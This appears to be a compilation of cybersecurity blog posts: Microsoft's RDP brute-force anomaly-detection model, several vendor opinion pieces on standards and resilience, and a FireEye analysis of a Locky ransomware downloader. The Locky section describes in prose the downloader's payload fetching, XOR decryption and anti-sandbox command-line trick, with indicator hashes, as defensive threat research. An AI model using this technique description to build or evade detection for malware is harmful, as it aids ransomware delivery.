Our approach to time series anomaly detection is computationally efficient, automatically learns how to update probabilities and adapt to changes in data.

As we describe in the next section, this approach has yielded successful attack detection at high precision.

Protecting customers from real-word RDP brute force attacks through Microsoft Threat Experts

The proposed time series anomaly detection model was deployed and utilized by Microsoft Threat Experts to detect RDP brute force attacks during threat hunting activities. A list that ranks machines across enterprises with the lowest anomaly scores (indicating the likelihood of observing a value at least as large under expected conditions in all signals considered) is updated and reviewed every day. See Table 1 for an example.

Table 1: Sample ranking of detected RDP inbound brute force attacks

For each machine with detection of a probable brute force attack, each instance is assigned TP, FP, or unknown. Each TP is then assigned priority based on the severity of the attack. For high-priority TP, a targeted attack notification is sent to the associated organization with details about the active brute force attack and recommendations for mitigating the threat; otherwise the machine is closely monitored until more information is available.

We also added an extra capability to our anomaly detection: automatically sending targeted attack notifications about RDP brute force attacks, in many cases before the attack succeeds or before the actor is able to conduct further malicious activities. Looking at the most recent sample of about two weeks of graded detections, the average precision per day (i.e., true positive rate) is approximately 93.7% at a conservative false positive rate of 1%.

In conclusion, based on our careful selection of signals found to be highly associated with RDP brute force attacks, we demonstrated that proper application of time series anomaly detection can be very accurate in identifying real threats. We have filed a patent application for this probabilistic time series model for detecting RDP inbound brute force attacks. In addition, we are working on integrating this capability into Microsoft Defender ATP’s endpoint and detection response capabilities so that the detection logic can raise alerts on RDP brute force attacks in real-time.

Monitoring suspicious activity in failed sign-ins and network connections should be taken seriously—a real-time anomaly detection capable of self-updating with the changing dynamics in a network can indeed provide a sustainable solution. While Microsoft Defender ATP already has many anomaly detection capabilities integrated into its EDR capabilities, which enrich advanced threat protection across the broader Microsoft Threat Protection, we will continue to enhance these detections to cover more security scenarios. Using data science, we will continue to combine robust statistical and machine learning approaches with threat expertise and intelligence to deliver industry-leading protection to our customers through Microsoft Threat Protection.

 

 

Cole Sodja, Justin Carroll, Joshua Neil
Microsoft Defender ATP Research Team

 

 

Appendix 1: Models formulation

We utilize hierarchical zero-adjusted negative binomial dynamic models to capture the characteristics of the highly discrete count time series. Specifically, as shown in Figure 2, it’s expected that most of the time there won’t be failed sign-ins for valid credentials on a local machine; hence, there are excess zeros that would not be explained by standard probability distributions such as the negative binomial. In addition, the variance of non-zero counts is often much larger than the mean, where for example, valid scripts connecting via RDP can generate counts in the 20s or more over several minutes because of an outdated password. Moreover, given a combination of multiple users or scripts connecting to shared machines at the same time, this can generate more extreme counts at higher quantiles resulting in heavier tails, as seen in Figure 6.

Figure 6: Daily count of network failed sign-in for a machine with no brute force attack

Parametric discrete location/scale distributions do not generate well-calibrated p-values for rare time series, as seen in Figure 6, and thus if used to detect anomalies can result in too many FPs when looking across many machines at high time frequencies. To overcome this challenge dealing with the sparse time series of counts of failed sign-in and RDP inbound public connections we specify a mixture model, where, based on our analysis, a zero-inflated two-component negative binomial distribution was adequate.

Our formulation is based on thresholding values that determine when to transition to a distribution with larger location and/or scale as given in Equation 1. Hierarchical priors are given from empirical estimates of the sample moments across machines using about 1 month of data.

Equation 1: Zero-adjusted negative binomial threshold model

Negative binomial distribution (NB):

To our knowledge, this formulation does not yield a conjugate prior, and so directly computing probabilities from the posterior predicted density is not feasible. Instead, anomaly scores are generated based on drawing samples from all distributions and then computing the empirical right-tail p-value.

Updating parameters is done based on applying exponential smoothing. To avoid outliers skewing estimates, such as machines under brute force or other attacks, trimming is applied to sample from the distribution at a specified false positive rate, which was set to .1% for our study. Algorithm 1 outlines the logic.

The smoothing parameters were learned based on maximum likelihood estimation and then fixed during each new sequential update. To induce further uncertainty, bootstrapping across machines is done to produce a histogram of smoothing weights, and samples are drawn in accordance to their frequency. We found that weights concentrated away from 0 vary between .06% and 8% for over 90% of machines, thus leading to slow changes in the parameters. An extension using adaptive forgetting factors will be considered in future work to automatically learn how to correct smoothing in real time.

Algorithm 2: Updating model parameters real-time

Appendix 2: Fisher Combination

For a given device, for each signal that exists a score is computed defined as a p-value, where lower values are associated with higher likelihood of being an anomaly. Then the p-values are combined to yield a joint score across all signals based on using the Fisher p-value combination method as follows:

The use of Fisher’s test applied to anomaly scores produces a scalable solution that yields interpretable probabilities that thus can be controlled to achieve a desired false positive rate. This has even been applied in a cybersecurity context. [3]

 

 

[1] Najafabadi et al, Machine Learning for Detecting Brute Force Attacks at the Network Level, 2014 IEEE 14th International Conference on Bioinformatics and Bioengineering
[2] Sexton et al, Attack chain detection, Statistical Analysis and Data Mining, 2015
[3] Heard, Combining Weak Statistical Evidence in Cyber Security, Intelligent Data Analysis XIV, 2015

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks appeared first on Microsoft Security.

The Challenges of UK Cyber Security Standards

Article by Matt Cable, VP Solutions Architect and MD Europe, Certes Networks

Public sector organisations in the UK are in the midst of changing cyber security regulations. In mid-2018, the Government, in collaboration the NCSC, published a minimum set of cyber security standards. These standards are now mandated, along with a focus on continually “raising the bar”. The standards set minimum requirements for organisations to protect sensitive information and key operational services, which – given the way in which these services are increasingly dispersed – is driving significant changes in public sector network architecture and security.

In addition to setting today’s ‘minimum’ standards, however, the guidance also sets a target date of 2023 by which public sector organisations will be expected to have adopted a ‘gold-standard’ cyber security profile. Matt Cable, VP Solutions Architect and MD Europe, Certes Networks, therefore outlines the essential considerations that will help organisations select an encryption solution provider that can easily integrate into any network infrastructure as they migrate from Legacy MPLS to SDN or SD-WAN network architectures.

The Principles
For both public and private sector organisations, customer experience is key. From finance and utilities, to local authorities and smart cities, customer touchpoints are increasingly dispersed, remote and application-driven, necessitating a move from Legacy MPLS to SDN or SD-WAN. However, under the Government’s new minimum cyber security standards framework, ensuring sensitive information and key services are protected is a critical consideration.

The UK’s National Cyber Security Centre (NCSC) has therefore issued principles for cyber secure enterprise technology to organisations, including guidance on deploying and buying network encryption, with the aim of reducing risks to the UK by securing public and private sector networks. This guidance bears parallels with the US National Institute of Standard and Technology’s (NIST) Cybersecurity Framework and therefore applies equally to US and other federal organisations in a similar scenario.

Similar to the NIST framework, the NCSC guidance shares the same principle that networks should not be trusted. It recommends that to keep sensitive information protected, encryption should be used between devices, the applications on them, and the services being accessed. IPsec is the recommended method for protecting all data travelling between two points on a network to provide an understood level of security, with further guidance outlining a specific ‘gold-standard’ cipher suite profile known as PRIME.

The guidance is based on the network vendor being CAS(T) certified (CESG (Communications Electronics Security Group) Assured Services (Telecommunications)), which involves an independent assessment focused on the key security areas of service availability, insider attack, unauthorised access to the network and physical attack.

However, there are challenges.

Challenge #1 – Public Sector Adherence to CAS(T)
Many public sector organisations are no longer mandating CAS(T) based services and therefore the risk appetite is expected to be lowered, mainly to support the emergence of internet and SD-WAN suppliers network solutions. This is key as the current NCSC recommendation Foundation standards for IPsec will expire in 2023, and users are being encouraged to move quickly off legacy platforms.

Challenge #2 – Impact to Cloud Service Providers and Bearer Networks
This guidance, such as the protection of information flows on dedicated links between organisations, also applies to cloud service providers, or in the inter-data-centre connections in such providers' networks.

The underlying bearer network is assumed not to provide any security or resilience. This means that any bearer network (such as the Internet, Wi-Fi 4/5G, or a commercial MPLS network) can be used. The choice of bearer network(s) will have an impact on the availability that an encrypted service can provide.

Challenge #3 – Partner Collaboration
NCSC explicitly states in its guidance that establishing trustworthy encrypted network links is not just about technology. It is also important that the management of these networks links is carried out by appropriate individuals, performing their assigned management activities in a competent and trusted fashion, from a management system that protects the overall integrity of the system. Thus, for encryption solution providers, the partner’s service credentials impact how the end user may use the technology.

The Solution
IPsec helps protect the confidentiality and integrity of information as it travels across less-trusted networks, by implementing network-based encryption to establish Virtual Private Networks (VPNs).

Under PRIME principles, devices which implement cryptographic protection of information using IPsec should:

  • Be managed by a competent authority in a manner that does not undermine the protection they provide, from a suitable management platform
  • Be configured to provide effective cryptographic protection
  • Use certificates as a means of identifying and trusting other devices, using a suitable PKI
  • Be independently assured to Foundation Grade, and operated in accordance with published Security Procedures
  • Be initially deployed in a manner that ensures their future trustworthiness
  • Be disposed of securely
Keeping the network design simple is one of the most effective ways to ensure the network provides the expected security and performance. The use of certificates generated in a cryptographically secure manner allows VPN gateways and clients to successfully identify themselves to each other while helping to mitigate brute force attacks.

Conclusion
There are many encryption solutions to help agencies and federal governments who want to move from Legacy MPLS to SDN or SD-WAN. Layer 4 encryption, for example, can integrate easily into any network and encrypt data in transit without disrupting performance or replacing the current network architecture.

Selecting a provider that can offer a PRIME compliant solution – such as Layer 4 encryption - is key in conforming to both today and tomorrow’s cybersecurity standards. And with NCSC starting to treat all networks as untrusted networks (especially those agencies using internet), PRIME is becoming the gold standard for which NCSC will measure regulatory compliance.

Therefore, it is important to consider a vendor that can offer a security solution that is not only compliant but is simple and uncomplicated, minimising disruption, resources and costs.

Broken Security? Most Business Leaders aren’t confident about their Cybersecurity

Cybersecurity is a critical battleground for UK businesses today, as the digital footprints of individuals and enterprises continue to grow. However, according to a new study commissioned by VMware in partnership with Forbes Insights, only a quarter (25%) of business leaders across EMEA are confident in their current cybersecurity practices, with UK spending without adequate assessment of the needs of organisations now commonplace.

VMware research reveals British businesses battle sophisticated security threats with old tools and misplaced spend

Key findings of the Study
  • 78% of UK business and IT security leaders believe the cybersecurity solutions their organisation is working with are outdated (despite 40% having acquired new tools over the past 12 months to address potential threats)
  • 74% reveal plans to invest even more in detecting and identifying attacks in the next three years, despite having a multitude of products already installed – a quarter (26%) of businesses currently have 26 or more products for this
  • Only 16% state extreme confidence in the readiness of their organisation to address emerging security challenges
The research shows UK businesses are trapped in a routine of spending without adequately assessing the needs of their organisation. Three quarters (78%) of business and IT security leaders believe the cybersecurity solutions their organisation is working with are outdated, despite 40% having acquired new tools over the past year to address potential threats. Nearly three quarters (74%), meanwhile, reveal plans to invest even more in detecting and identifying attacks in the next three years, despite having a multitude of products already installed – a quarter (26%) of businesses currently have 26 or more products across their enterprises for this.

The apparent hope of UK businesses to spend their way out of security crises is coupled with a significant security skills gap: just 16% of UK respondents state extreme confidence in the readiness of their organisation to address emerging security challenges, with only 14% extremely confident in the readiness of their people and talent.

The result is that, despite British businesses shoring up their defences against an evolving threat landscape, the complexity surrounding multiple cybersecurity solutions is making it harder for organisations to respond, urgently adapt or improve their strategies. In fact, a third (34%) of IT security leaders state it can take up to an entire week to address an issue.

Ian Jenkins, Director, Networking and Security UK & Ireland, VMware, said of the findings: “Businesses across the UK and beyond continue to follow the same IT security paths, and yet expect to see different results. Yet we now live in a world of greater complexity, with more and more intricate interactions, more connected devices and sensors, dispersed workers and the cloud, all of which have created an exponentially larger attack surface. Investment in traditional security solutions continues to be dwarfed by the economic repercussions of breaches.”

The lack of confidence highlighted in this study sits within a chasm forming between business leaders and security teams. In the UK, only a quarter (24%) of IT teams consider C-suite executives in their organisation to be ‘highly collaborative’ when it comes to cybersecurity. Across EMEA, meanwhile, only 27% of executives and only 16% of IT security practitioners say they are collaborating in a significant way to address cybersecurity issues.

Jenkins concludes, “Modern-day security requires a fundamental shift away from prevailing preventative solutions that try to prevent breaches at all costs. British businesses must invest in solutions that make security intrinsic to everything – the application, the network, essentially everything that connects and carries data. Breaches are inevitable, but how fast and how effectively you can mitigate that threat and protect the continuity of operations is what matters. Combining this approach with a culture of security awareness and collaboration across all departments is crucial to driving cyber best practice forward, and helping enterprises in the UK and across EMEA stay one step ahead in the world of sophisticated cybercrime.”

For Caught in the Crossfire of Cyberwarfare

Authored by Dr Sandra Bell, Head of Resilience Consulting EMEA, Sungard Availability Services 

The 2019 National Cyber Security Centre’s (NCSC) Annual Review does not shy away from naming the four key protagonists when it comes to state-based cyber threats against our country. The review sites China, Russia, North Korea and Iran as being actively engaged in cyber operations against our Critical National Infrastructure and other sectors of society. That being said, the main cyber threat to businesses and individual citizens remains organised crime. But with the capability of organised crime matching some state-based activity and the sharing (if not direct support) of state-based techniques with cyber criminals, how are we expected to defend ourselves against such sophisticated cyberattack means?

The answer offered by Ciaran Martin, CEO of the NCSC, in his Forward to the 2019 Review only scratches the surface of the cultural change we need to embrace if we are to become truly cyber resilient to these modern-day threats.

“Looking ahead, there is also the risk that advanced cyberattack techniques could find their way into the hands of new actors, through the proliferation of such tools on the open market. Additionally, we must always be mindful of the risk of accidental impact from other attacks. Cyber security has moved away from the exclusive prevail of security and intelligence agencies towards one that needs the involvement of all of government, and indeed all of society.”

There are a few key points to draw out from this statement. Firstly, there is an acceptance that all of us may be collateral damage in a broader state-on-state cyberattack. Secondly, we should accept also that we maybe the victims of very sophisticated cyberattacks that have their roots in state-sponsored development. And finally, we must all accept that cyber security is a collective responsibility and, where businesses are concerned, this responsibility must be accepted and owned at the very top.

Modern life is now dependent on cyber security but we are yet to truly embrace the concept of a cyber secure culture. When we perceived terrorism as the major threat to our security, society quickly adopted a ‘reporting culture’ of anything suspicious, but have we seen the same mindset shift with regards to cyber threats? The man in the street may not be the intended target of a state-based or organised crime cyberattack but we can all easily become a victim, either accidentally as collateral damage or intentionally as low-hanging fruit. Either way we can all, individual citizens and businesses alike, fall victim to the new battleground of cyberwarfare.

What can business do in the face of such threats?
One could argue that becoming a victim of cybercrime is a when not an if. This can in turn bring about a sense of the inevitability. But what is clear when you see the magnitude of recent Information Commissioner’s Office (ICO) fines, is that businesses cannot ignore cyber security issues. A business that embraces the idea of a cybersecurity culture within its organisation will not only be less likely to be hit with a fine from the ICO should things go horribly wrong, but are also less likely to fall victim in the first place. Cyber security is about doing the basics well and preparing your organisation to protect itself, and responding correctly when an incident occurs.

Protecting against a new kind of warfare
Organisations need to prepare to potentially become the unintended targets of broad-brush cyberattacks, protecting themselves against the impact they could have on their operations and customer services. With each attack growing in its complexity, businesses must in-tow respond in a swift and sophisticated manner. Defence mechanisms need to be as scalable as the nefarious incidents they may be up against. To give themselves the best chance of ensuring that an attack doesn’t debilitate them and the country in which they operate, there are a few key things that businesses can do:

1) Act swiftly
A cyberattack requires an immediate response from every part of a business. Therefore, when faced with a potential breach, every individual must know how to react precisely and quickly. IT and business teams will need to locate and close any vulnerabilities in IT systems or business processes and switch over to Disaster Recovery arrangements if they believe there has been a data corruption. Business units need to invoke their Business Continuity Plans and the executive Crisis Management Team needs to assemble. This team needs to be rehearsed in cyber related crisis events and not just the more traditional Business Continuity type of crisis.

Both the speed and effectiveness of a response will be greatly improved if businesses have at their fingertips the results of a Data Protection Impact Assessment (DPIA) that details all the personal data collected, processed and stored, categorised by level of sensitivity. If companies are scrambling around, unsure of who should be taking charge and what exactly should be done, then the damage caused by the data encryption will only be intensified.

2) Isolate the threat
Value flows from business to business through networks and supply chains, but so do malware infections. Having adequate back-up resources not only brings back business availability in the wake of an attack, but it also serves to act as a barrier to further disruption in the network. The key element that cybercriminals and hacking groups have worked to iterate on is their delivery vector.

Phishing attempts are more effective if they’re designed using the techniques employed in social engineering. A study conducted by IBM found that human error accounts for more than 95 per cent of security incidents. The majority of the most devastating attacks from recent years have been of the network-based variety, i.e. worms and bots.

Right now, we live in a highly connected world with hyper-extended networks comprised of a multitude of mobile devices and remote workers logging in from international locations. Having a crisis communication plan that sets out in advance who needs to be contacted should a breach occur will mean that important stakeholders based in different locations don’t get forgotten in the heat of the moment.

3) Rely on resilience
Prevention is always better than cure. Rather than waiting until a data breach occurs to discover the hard way which threats and vulnerabilities are present in IT systems and business processes, act now.

It’s good business practice to continuously monitor risk, including information risk, and ensure that the controls are adequate. However, in the fast-paced cyber world where the threats are constantly changing this can be difficult in practice.

With effective Disaster Recovery and cyber focused Business Continuity practices written into business contingency planning, organisations remain robust and ready to spring into action to minimise the impact of a data breach.

The most effective way to test business resilience without unconscious bias risking false-positive results is via evaluation by external security professionals. By conducting physical and logical penetration testing and regularly checking an organisation’s susceptibility to social engineering, effective business continuity can be ensured, and back-up solutions can be rigorously tested.

Cyber Resilience must be woven into the fabric of business operations, including corporate culture itself. Crisis leadership training ensures the C-suite has the skills, competencies and psychological coping strategies that help lead an organisation through the complex, uncertain and unstable environment that is caused by a cyberattack, emerging the other side stronger and more competitive than ever before.

A look ahead to the future
A cyberattack is never insignificant, nor expected, but if a business suffers one it is important to inform those that are affected as quickly as possible. Given the scale at which these are being launched, this couldn’t be truer. It’s vital in the current age of state-backed attacks that businesses prioritise resilience lest they be caught in the crossfire. In a business landscape defined by hyper-extended supply chains, having a crisis communication plan that sets out in advance who needs to be contacted should a breach occur will mean that important stakeholders don’t get forgotten in the heat of the moment and that the most important assets remain protected.

Why Cybersecurity Breach Survivors are Valued Assets

Guest article By Ewen O’Brien, VP of Enterprise, EMEA at BitSight

No one wants to talk about their failures, especially in the cybersecurity realm where the stakes are high. But new insight from Symantec and Goldsmiths, University of London, finds that security professionals who have lived through a cybersecurity attack or breach could be the answer to protecting your organisation against future threats.

The report reveals that just over half of the 3,000 CISOs surveyed believe that learning from failure is incredibly valuable and a vital part of improving corporate cybersecurity postures. Indeed, these professionals may very well be your company’s best line of defence in the face of a potential cyberattack.

The Value of “Cybersecurity Breach Survivors”

Security professionals who have lived through an avoidable breach possess a unique mindset. They are less likely to experience burnout, are less indifferent to their work, less likely to think about quitting their job, feel less personally responsible for an incident, and are more likely to share their learning experiences. Cybersecurity breach survivors also have the first-hand experience of what works on the frontlines of security performance management and what doesn’t and are well versed in crisis management, recovery procedures, and team focus.

Furthermore, cyberattack veterans have unique perspectives on cybersecurity risk management. They understand that risk mitigation requires more than the right tools and technology. Unless an organisation takes a risk-based view of security, where all stakeholders (not just IT) understand the inherent threat of doing business in a digital world, then all the firewalls, endpoint protection, and other security measures won’t help.

Sharing Insights About Cybersecurity Breaches: The Best Defence
Unfortunately, while many businesses tend to extol the virtues of openness and information-sharing, cybersecurity remains a taboo subject for many. Cyber breaches are treated like a scarlet letter, and security teams are often hesitant to share information or discuss vulnerabilities that led to breaches and lessons learned from those incidents.

That might be why security professionals who’ve “been there and done it” remain unfortunately tight-lipped about their experiences. The Symantec/Goldsmiths study shows that 54% of respondents don’t discuss breaches or attacks with their industry peers, with 36% fearing that sharing this information could impact their professional reputation and career prospects.

This new report flips that thinking on its head, and boldly asserts several best practices: that these learnings should be shared, that company boards should foster a more open learning culture for security teams, and that data breach survivors should be at the top of your company's list of hiring priorities.

Indeed, sharing experiences is critically important, especially since everyone in the company must be involved in protecting the organisation. The cybersecurity skills shortage mandates that everyone, from the CEO on down, needs to take responsibility.

Not adhering to this policy can yield some sobering results. The average cost of a cyber breach has now reached $4.6 million per incident. But the impact extends beyond potential financial and reputational ruin. Security teams are also feeling the burn with 51% of tech executives experiencing cybersecurity burnout and stress-related illnesses as a result of cyberattacks, breaches, and outages.

Experience with Vulnerabilities Can Strengthen Security Performance Management 

We’re all vulnerable about our vulnerabilities. But cybersecurity professionals who have witnessed an attack first-hand should be applauded, not vilified. And they should feel confident that their experience can help their organisations be better prepared for the future. Their experiences--and the knowledge they’ve gained from those experiences--can be used to bolster security performance management and create a formidable front against potential threats.

Eliminating the Social Media Cyber Security Blind Spot

Guest article by Anthony Perridge, VP International, ThreatQuotient
More than three billion people around the world use social media each month, with 90% of those users accessing their chosen platforms via mobile devices. While, historically, financial services (FinServ) institutions discouraged the use of social media, it has become a channel that can no longer be ignored.

FinServ institutions are widely recognised as leaders in cybersecurity, employing layers of defence and highly skilled security experts to protect their organisations. But as the attack surface expands with the growing use of social media and external digital platforms, many FinServ security teams are blind to a new wave of digital threats outside the firewall.

Social media is a morass of information flooding the Internet with billions of posts per day that comprise text, images, hashtags and different types of syntax. It is as broad as it is deep and requires an equally broad and deep combination of defences to identify and mitigate the risk it presents.

Understanding prevalent social media threats
Analysis of prevalent social media risks shows the breadth and depth of these types of attacks. A deeper understanding of how bad actors are using social media and digital platforms for malicious purposes is extremely valuable as FinServ institutions strive to strengthen their defence-in-depth architectures and mitigate risk to their institutions, brands, employees and customers.

To gain visibility, reduce risk and automate protection, leaders in the financial industry are expanding their threat models to include these threat vectors. They are embracing a data-driven approach that uses automation and machine learning to keep pace with these persistent and continuously evolving threats, automatically finding fraudulent accounts, spear-phishing attacks, customer scams, exposed personally identifiable information (PII), account takeovers and more.

They are aggregating this data into a central repository so that their threat intelligence teams can trace attacks back to malicious profiles, posts, comments or pages, as well as pivot between these different social media objects for context. Network security teams can block their users from accessing malicious social objects to help prevent attacks, and incident response teams can compare their organisation’s telemetry of incidents with known indicators of compromise to mitigate damage.

Employee education is also a critical component of standard defences. Raising awareness of these threats through regular training and instituting policies to improve social media security hygiene with respect to company and personal accounts goes a long way to preventing these attacks in the first place.

A Checklist for Financial Institutions This checklist that encompasses people, process and technology will go a long way toward helping FinServ security teams better protect their institutions, brands, employees and customers.
  1. IDENTIFY the institution’s social media and digital footprint, including accounts for the company, brands, locations, executives and key individuals.
  2. OBTAIN “Verified Accounts” for company and brand accounts on social media. This provides assurance to customers that they are interacting with legitimate accounts and prevents impersonators from usurping a “Verified Account.”
  3. ENABLE two-factor authentication for social media accounts to deter hijacking and include corporate and brand social media accounts in IT password policy requirements.
  4. MONITOR for spoofed and impersonator accounts and, when malicious, arrange for takedown
  5. IDENTIFY scams, fraud, money-flipping and more by monitoring for corporate and brand social media pages.
  6. MONITOR for signs of corporate and executive social media account hijacking. Early warning indicators are important in protecting the organisation’s brand.
  7. DEPLOY employee training and policies on social media security hygiene.
  8. INCORPORATE a social media and digital threat feed into a threat intelligence platform as part of an overall defence-in-depth approach. This allows teams to ingest, correlate and take action faster on attacks made against their institution via social media.
Conclusion
FinServ institutions and their customers use many different social networks to communicate and conduct business but are often blind to the risk bad actors present as they increasingly targeting these public, uncontrolled channels to commit financial fraud, damage brands and even pose physical threats.

FinServ security teams need visibility into digital threats outside the firewall and actionable information to reduce risk and automate protection. Those that are most successful have a defence-in-depth architecture that includes intelligence on social and digital threats, context to understand what threats pose the greatest risk, and the ability to build on existing processes and workflows to block more threats and accelerate remediation.

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample shown is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in program crash as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes

2cdf62f8aae20026418f143895c769a2009e6b9b3ac59bfa8fc79ca2f326b93a

1fd5c1f0ecc1d54324f3bdc327e7893032482a13c0914ef6f531bd93caef0a06

0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06

22645be8553628574a7af3c32a45178e201e9af33b20b36d29b9c012b731da4c

198d8d1a89221c575d957c1f4342741f3675ebb10f95ffe3371150e124f4850e